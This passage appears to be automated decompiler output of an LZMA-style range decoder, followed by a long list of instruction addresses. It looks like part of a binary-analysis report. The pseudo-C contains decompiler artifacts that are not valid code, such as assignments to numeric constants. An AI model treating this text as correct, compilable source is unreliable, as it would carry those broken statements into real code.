											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L110:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t366 = __ebp - 0x70;
											 *_t366 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t366;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L112;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											L132:
											 *(_t612 - 0x54) = _t605;
											goto L133;
										case 0x12:
											goto L0;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												goto L144;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											goto L130;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											L140:
											 *(_t612 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L121;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											goto L145;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											goto L149;
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L120:
												_t394 = __ebp - 0x2c;
												 *_t394 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t394;
												L121:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t401 = __ebp - 0x60;
												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t401;
												goto L124;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L103:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L109:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L113:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t392 = __ebp - 0x2c;
														 *_t392 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t392;
														goto L120;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L112:
														_t369 = __ebp - 0x48;
														 *_t369 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t369;
														goto L113;
													} else {
														goto L110;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L102:
													_t339 = __ebp - 0x48;
													 *_t339 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t339;
													goto L103;
												} else {
													goto L100;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L109;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L124:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t415 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t415;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t415;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											L170:
											_push(0x22);
											_pop(_t567);
											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
											_t535 = 0;
											L172:
											return _t535;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
						__eax =  *(__ebp - 0x50);
						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
						__eax =  *(__ebp - 0x58);
						__esi = __edx + __eax;
						 *(__ebp - 0x54) = __esi;
						__ax =  *__esi;
						__edi = __ax & 0x0000ffff;
						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
						if( *(__ebp - 0xc) >= __ecx) {
							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
							__cx = __ax;
							__cx = __ax >> 5;
							__eax = __eax - __ecx;
							__edx = __edx + 1;
							 *__esi = __ax;
							 *(__ebp - 0x50) = __edx;
						} else {
							 *(__ebp - 0x10) = __ecx;
							0x800 = 0x800 - __edi;
							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
							 *__esi = __cx;
						}
						if( *(__ebp - 0x10) >= 0x1000000) {
							goto L148;
						} else {
							goto L146;
						}
					}
					goto L1;
				}
			}








                                                0x00000000
                                                0x0040680a
                                                0x0040680a
                                                0x0040680e
                                                0x00406833
                                                0x0040683d
                                                0x00000000
                                                0x00406810
                                                0x00406810
                                                0x00406813
                                                0x00406817
                                                0x0040681a
                                                0x0040681d
                                                0x00406821
                                                0x00406821
                                                0x00406824
                                                0x004068fe
                                                0x004068fe
                                                0x00406905
                                                0x00406905
                                                0x00406908
                                                0x0040690f
                                                0x0040693c
                                                0x00406940
                                                0x004069a0
                                                0x004069a3
                                                0x004069a8
                                                0x004069a9
                                                0x004069ab
                                                0x004069ad
                                                0x004069b0
                                                0x004068bc
                                                0x004068bc
                                                0x004068bc
                                                0x00406058
                                                0x00406058
                                                0x00406058
                                                0x00406061
                                                0x00000000
                                                0x00000000
                                                0x00406067
                                                0x00000000
                                                0x00406072
                                                0x00000000
                                                0x00000000
                                                0x0040607b
                                                0x0040607e
                                                0x00406081
                                                0x00406085
                                                0x00000000
                                                0x00000000
                                                0x0040608b
                                                0x0040608e
                                                0x00406090
                                                0x00406091
                                                0x00406094
                                                0x00406096
                                                0x00406097
                                                0x00406099
                                                0x0040609c
                                                0x004060a1
                                                0x004060a6
                                                0x004060af
                                                0x004060c2
                                                0x004060c5
                                                0x004060d1
                                                0x004060f9
                                                0x004060fb
                                                0x00406109
                                                0x00406109
                                                0x0040610d
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004060fd
                                                0x004060fd
                                                0x00406100
                                                0x00406101
                                                0x00406101
                                                0x00000000
                                                0x004060fd
                                                0x004060d7
                                                0x004060dc
                                                0x004060dc
                                                0x004060e5
                                                0x004060ed
                                                0x004060f0
                                                0x00000000
                                                0x004060f6
                                                0x004060f6
                                                0x00000000
                                                0x004060f6
                                                0x00000000
                                                0x00406113
                                                0x00406113
                                                0x00406117
                                                0x004069c3
                                                0x00000000
                                                0x004069c3
                                                0x00406120
                                                0x00406130
                                                0x00406133
                                                0x00406136
                                                0x00406136
                                                0x00406136
                                                0x00406139
                                                0x0040613d
                                                0x00000000
                                                0x00000000
                                                0x0040613f
                                                0x00406145
                                                0x0040616f
                                                0x00406175
                                                0x0040617c
                                                0x00000000
                                                0x0040617c
                                                0x0040614b
                                                0x0040614e
                                                0x00406153
                                                0x00406153
                                                0x0040615e
                                                0x00406166
                                                0x00406169
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004061ae
                                                0x004061b4
                                                0x004061b7
                                                0x004061c4
                                                0x004061cc
                                                0x00000000
                                                0x00000000
                                                0x00406183
                                                0x00406183
                                                0x00406187
                                                0x004069d2
                                                0x00000000
                                                0x004069d2
                                                0x00406193
                                                0x0040619e
                                                0x0040619e
                                                0x0040619e
                                                0x004061a1
                                                0x004061a4
                                                0x004061a7
                                                0x004061ac
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406843
                                                0x00406843
                                                0x00406849
                                                0x0040684f
                                                0x00406855
                                                0x0040686f
                                                0x00406872
                                                0x00406878
                                                0x00406883
                                                0x00406883
                                                0x00406885
                                                0x00406857
                                                0x00406857
                                                0x00406866
                                                0x0040686a
                                                0x0040686a
                                                0x0040688f
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406891
                                                0x00406895
                                                0x00406a44
                                                0x00000000
                                                0x00406a44
                                                0x004068a1
                                                0x004068a8
                                                0x004068b0
                                                0x004068b3
                                                0x004068b6
                                                0x004068b6
                                                0x00000000
                                                0x00000000
                                                0x004061d4
                                                0x004061d6
                                                0x004061d9
                                                0x0040624a
                                                0x0040624d
                                                0x00406250
                                                0x00406257
                                                0x00406261
                                                0x00000000
                                                0x00406261
                                                0x004061db
                                                0x004061df
                                                0x004061e2
                                                0x004061e4
                                                0x004061e7
                                                0x004061ea
                                                0x004061ec
                                                0x004061ef
                                                0x004061f1
                                                0x004061f6
                                                0x004061f9
                                                0x004061fc
                                                0x00406200
                                                0x00406207
                                                0x0040620a
                                                0x00406211
                                                0x00406215
                                                0x0040621d
                                                0x0040621d
                                                0x0040621d
                                                0x00406217
                                                0x00406217
                                                0x00406217
                                                0x0040620c
                                                0x0040620c
                                                0x0040620c
                                                0x00406221
                                                0x00406224
                                                0x00406242
                                                0x00406244
                                                0x00000000
                                                0x00406226
                                                0x00406226
                                                0x00406229
                                                0x0040622c
                                                0x0040622f
                                                0x00406231
                                                0x00406231
                                                0x00406231
                                                0x00406234
                                                0x00406237
                                                0x00406239
                                                0x0040623a
                                                0x0040623d
                                                0x00000000
                                                0x0040623d
                                                0x00000000
                                                0x00406473
                                                0x00406477
                                                0x00406495
                                                0x00406498
                                                0x0040649f
                                                0x004064a2
                                                0x004064a5
                                                0x004064a8
                                                0x004064ab
                                                0x004064ae
                                                0x004064b0
                                                0x004064b7
                                                0x004064b8
                                                0x004064ba
                                                0x004064bd
                                                0x004064c0
                                                0x004064c3
                                                0x004064c3
                                                0x004064c8
                                                0x00000000
                                                0x004064c8
                                                0x00406479
                                                0x0040647c
                                                0x0040647f
                                                0x00406489
                                                0x00000000
                                                0x00000000
                                                0x004064dd
                                                0x004064e1
                                                0x00406504
                                                0x00406507
                                                0x0040650a
                                                0x00406514
                                                0x004064e3
                                                0x004064e3
                                                0x004064e6
                                                0x004064e9
                                                0x004064ec
                                                0x004064f9
                                                0x004064fc
                                                0x004064fc
                                                0x00000000
                                                0x00000000
                                                0x00406520
                                                0x00406524
                                                0x00000000
                                                0x00000000
                                                0x0040652a
                                                0x0040652e
                                                0x00000000
                                                0x00000000
                                                0x00406534
                                                0x00406536
                                                0x0040653a
                                                0x0040653a
                                                0x0040653d
                                                0x00406541
                                                0x00000000
                                                0x00000000
                                                0x00406591
                                                0x00406595
                                                0x0040659c
                                                0x0040659f
                                                0x004065a2
                                                0x004065ac
                                                0x00000000
                                                0x004065ac
                                                0x00406597
                                                0x00000000
                                                0x00000000
                                                0x004065b8
                                                0x004065bc
                                                0x004065c3
                                                0x004065c6
                                                0x004065c9
                                                0x004065be
                                                0x004065be
                                                0x004065be
                                                0x004065cc
                                                0x004065cf
                                                0x004065d2
                                                0x004065d2
                                                0x004065d5
                                                0x004065d8
                                                0x004065db
                                                0x004065db
                                                0x004065de
                                                0x004065e5
                                                0x004065ea
                                                0x00000000
                                                0x00000000
                                                0x00406678
                                                0x00406678
                                                0x0040667c
                                                0x00406a1a
                                                0x00000000
                                                0x00406a1a
                                                0x00406682
                                                0x00406685
                                                0x00406688
                                                0x0040668c
                                                0x0040668f
                                                0x00406695
                                                0x00406697
                                                0x00406697
                                                0x00406697
                                                0x0040669a
                                                0x0040669d
                                                0x00000000
                                                0x00000000
                                                0x0040626d
                                                0x0040626d
                                                0x00406271
                                                0x004069de
                                                0x00000000
                                                0x004069de
                                                0x00406277
                                                0x0040627a
                                                0x0040627d
                                                0x00406281
                                                0x00406284
                                                0x0040628a
                                                0x0040628c
                                                0x0040628c
                                                0x0040628c
                                                0x0040628f
                                                0x00406292
                                                0x00406292
                                                0x00406295
                                                0x00406298
                                                0x00000000
                                                0x00000000
                                                0x0040629e
                                                0x004062a4
                                                0x00000000
                                                0x00000000
                                                0x004062aa
                                                0x004062aa
                                                0x004062ae
                                                0x004062b1
                                                0x004062b4
                                                0x004062b7
                                                0x004062ba
                                                0x004062bb
                                                0x004062be
                                                0x004062c0
                                                0x004062c6
                                                0x004062c9
                                                0x004062cc
                                                0x004062cf
                                                0x004062d2
                                                0x004062d5
                                                0x004062d8
                                                0x004062f4
                                                0x004062f7
                                                0x004062fa
                                                0x004062fd
                                                0x00406304
                                                0x00406308
                                                0x0040630a
                                                0x0040630e
                                                0x004062da
                                                0x004062da
                                                0x004062de
                                                0x004062e6
                                                0x004062eb
                                                0x004062ed
                                                0x004062ef
                                                0x004062ef
                                                0x00406311
                                                0x00406318
                                                0x0040631b
                                                0x00000000
                                                0x00406321
                                                0x00000000
                                                0x00406321
                                                0x00000000
                                                0x00406326
                                                0x00406326
                                                0x0040632a
                                                0x004069ea
                                                0x00000000
                                                0x004069ea
                                                0x00406330
                                                0x00406333
                                                0x00406336
                                                0x0040633a
                                                0x0040633d
                                                0x00406343
                                                0x00406345
                                                0x00406345
                                                0x00406345
                                                0x00406348
                                                0x0040634b
                                                0x0040634b
                                                0x0040634b
                                                0x00406351
                                                0x00000000
                                                0x00000000
                                                0x00406353
                                                0x00406356
                                                0x00406359
                                                0x0040635c
                                                0x0040635f
                                                0x00406362
                                                0x00406365
                                                0x00406368
                                                0x0040636b
                                                0x0040636e
                                                0x00406371
                                                0x00406389
                                                0x0040638c
                                                0x0040638f
                                                0x00406392
                                                0x00406392
                                                0x00406395
                                                0x00406399
                                                0x0040639b
                                                0x00406373
                                                0x00406373
                                                0x0040637b
                                                0x00406380
                                                0x00406382
                                                0x00406384
                                                0x00406384
                                                0x0040639e
                                                0x004063a5
                                                0x004063a8
                                                0x00000000
                                                0x004063aa
                                                0x00000000
                                                0x004063aa
                                                0x004063a8
                                                0x004063af
                                                0x004063af
                                                0x004063af
                                                0x004063af
                                                0x00000000
                                                0x00000000
                                                0x004063ea
                                                0x004063ea
                                                0x004063ee
                                                0x004069f6
                                                0x00000000
                                                0x004069f6
                                                0x004063f4
                                                0x004063f7
                                                0x004063fa
                                                0x004063fe
                                                0x00406401
                                                0x00406407
                                                0x00406409
                                                0x00406409
                                                0x00406409
                                                0x0040640c
                                                0x0040640f
                                                0x0040640f
                                                0x00406415
                                                0x004063b3
                                                0x004063b3
                                                0x004063b6
                                                0x00000000
                                                0x004063b6
                                                0x00406417
                                                0x00406417
                                                0x0040641a
                                                0x0040641d
                                                0x00406420
                                                0x00406423
                                                0x00406426
                                                0x00406429
                                                0x0040642c
                                                0x0040642f
                                                0x00406432
                                                0x00406435
                                                0x0040644d
                                                0x00406450
                                                0x00406453
                                                0x00406456
                                                0x00406456
                                                0x00406459
                                                0x0040645d
                                                0x0040645f
                                                0x00406437
                                                0x00406437
                                                0x0040643f
                                                0x00406444
                                                0x00406446
                                                0x00406448
                                                0x00406448
                                                0x00406462
                                                0x00406469
                                                0x0040646c
                                                0x00000000
                                                0x0040646e
                                                0x00000000
                                                0x0040646e
                                                0x00000000
                                                0x004066fb
                                                0x004066fb
                                                0x004066ff
                                                0x00406a26
                                                0x00000000
                                                0x00406a26
                                                0x00406705
                                                0x00406708
                                                0x0040670b
                                                0x0040670f
                                                0x00406712
                                                0x00406718
                                                0x0040671a
                                                0x0040671a
                                                0x0040671a
                                                0x0040671d
                                                0x00000000
                                                0x00000000
                                                0x004064cb
                                                0x004064cb
                                                0x004064ce
                                                0x00406840
                                                0x00406840
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004068c7
                                                0x004068cb
                                                0x004068e9
                                                0x004068e9
                                                0x004068e9
                                                0x004068f0
                                                0x004068f7
                                                0x00000000
                                                0x004068f7
                                                0x004068cd
                                                0x004068d0
                                                0x004068d3
                                                0x004068d6
                                                0x004068dd
                                                0x00000000
                                                0x00000000
                                                0x004069b8
                                                0x004069bb
                                                0x004068bc
                                                0x004068bc
                                                0x00000000
                                                0x00000000
                                                0x004065f2
                                                0x004065f4
                                                0x004065fb
                                                0x004065fc
                                                0x004065fe
                                                0x00406601
                                                0x00000000
                                                0x00000000
                                                0x00406609
                                                0x0040660c
                                                0x0040660f
                                                0x00406611
                                                0x00406613
                                                0x00406613
                                                0x00406614
                                                0x00406617
                                                0x0040661e
                                                0x00406621
                                                0x0040662f
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406914
                                                0x00406914
                                                0x00406918
                                                0x00406a50
                                                0x00000000
                                                0x00406a50
                                                0x0040691e
                                                0x00406921
                                                0x00406924
                                                0x00406928
                                                0x0040692b
                                                0x00406931
                                                0x00406933
                                                0x00406933
                                                0x00406933
                                                0x00406936
                                                0x00406939
                                                0x00406939
                                                0x00406939
                                                0x00406939
                                                0x00000000
                                                0x00000000
                                                0x00406637
                                                0x0040663a
                                                0x00406670
                                                0x004067a0
                                                0x004067a0
                                                0x004067a0
                                                0x004067a0
                                                0x004067a3
                                                0x004067a3
                                                0x004067a6
                                                0x004067a8
                                                0x00406a32
                                                0x00000000
                                                0x00406a32
                                                0x004067ae
                                                0x004067b1
                                                0x00000000
                                                0x00000000
                                                0x004067b7
                                                0x004067bb
                                                0x004067be
                                                0x004067be
                                                0x004067be
                                                0x00000000
                                                0x004067be
                                                0x0040663c
                                                0x0040663e
                                                0x00406640
                                                0x00406642
                                                0x00406645
                                                0x00406646
                                                0x00406648
                                                0x0040664a
                                                0x0040664d
                                                0x00406650
                                                0x00406666
                                                0x0040666b
                                                0x004066a3
                                                0x004066a3
                                                0x004066a7
                                                0x004066d3
                                                0x004066d5
                                                0x004066dc
                                                0x004066df
                                                0x004066e2
                                                0x004066e2
                                                0x004066e7
                                                0x004066e7
                                                0x004066e9
                                                0x004066ec
                                                0x004066f3
                                                0x004066f6
                                                0x00406723
                                                0x00406723
                                                0x00406726
                                                0x00406729
                                                0x0040679d
                                                0x0040679d
                                                0x0040679d
                                                0x00000000
                                                0x0040679d
                                                0x0040672b
                                                0x00406731
                                                0x00406734
                                                0x00406737
                                                0x0040673a
                                                0x0040673d
                                                0x00406740
                                                0x00406743
                                                0x00406746
                                                0x00406749
                                                0x0040674c
                                                0x00406765
                                                0x00406767
                                                0x0040676a
                                                0x0040676b
                                                0x0040676e
                                                0x00406770
                                                0x00406773
                                                0x00406775
                                                0x00406777
                                                0x0040677a
                                                0x0040677c
                                                0x0040677f
                                                0x00406783
                                                0x00406785
                                                0x00406785
                                                0x00406786
                                                0x00406789
                                                0x0040678c
                                                0x0040674e
                                                0x0040674e
                                                0x00406756
                                                0x0040675b
                                                0x0040675d
                                                0x00406760
                                                0x00406760
                                                0x0040678f
                                                0x00406796
                                                0x00406720
                                                0x00406720
                                                0x00406720
                                                0x00406720
                                                0x00000000
                                                0x00406798
                                                0x00000000
                                                0x00406798
                                                0x00406796
                                                0x004066a9
                                                0x004066ac
                                                0x004066ae
                                                0x004066b1
                                                0x004066b4
                                                0x004066b7
                                                0x004066b9
                                                0x004066bc
                                                0x004066bf
                                                0x004066bf
                                                0x004066c2
                                                0x004066c2
                                                0x004066c5
                                                0x004066cc
                                                0x004066a0
                                                0x004066a0
                                                0x004066a0
                                                0x004066a0
                                                0x00000000
                                                0x004066ce
                                                0x00000000
                                                0x004066ce
                                                0x004066cc
                                                0x00406652
                                                0x00406655
                                                0x00406657
                                                0x0040665a
                                                0x00000000
                                                0x00000000
                                                0x004063b9
                                                0x004063b9
                                                0x004063bd
                                                0x00406a02
                                                0x00000000
                                                0x00406a02
                                                0x004063c3
                                                0x004063c6
                                                0x004063c9
                                                0x004063cc
                                                0x004063cf
                                                0x004063d2
                                                0x004063d5
                                                0x004063d7
                                                0x004063da
                                                0x004063dd
                                                0x004063e0
                                                0x004063e2
                                                0x004063e2
                                                0x004063e2
                                                0x00000000
                                                0x00000000
                                                0x00406544
                                                0x00406544
                                                0x00406548
                                                0x00406a0e
                                                0x00000000
                                                0x00406a0e
                                                0x0040654e
                                                0x00406551
                                                0x00406554
                                                0x00406557
                                                0x00406559
                                                0x00406559
                                                0x00406559
                                                0x0040655c
                                                0x0040655f
                                                0x00406562
                                                0x00406565
                                                0x00406568
                                                0x0040656b
                                                0x0040656c
                                                0x0040656e
                                                0x0040656e
                                                0x0040656e
                                                0x00406571
                                                0x00406574
                                                0x00406577
                                                0x0040657a
                                                0x0040657a
                                                0x0040657a
                                                0x0040657d
                                                0x0040657f
                                                0x0040657f
                                                0x00000000
                                                0x00000000
                                                0x004067c1
                                                0x004067c1
                                                0x004067c1
                                                0x004067c5
                                                0x00000000
                                                0x00000000
                                                0x004067cb
                                                0x004067ce
                                                0x004067d1
                                                0x004067d4
                                                0x004067d6
                                                0x004067d6
                                                0x004067d6
                                                0x004067d9
                                                0x004067dc
                                                0x004067df
                                                0x004067e2
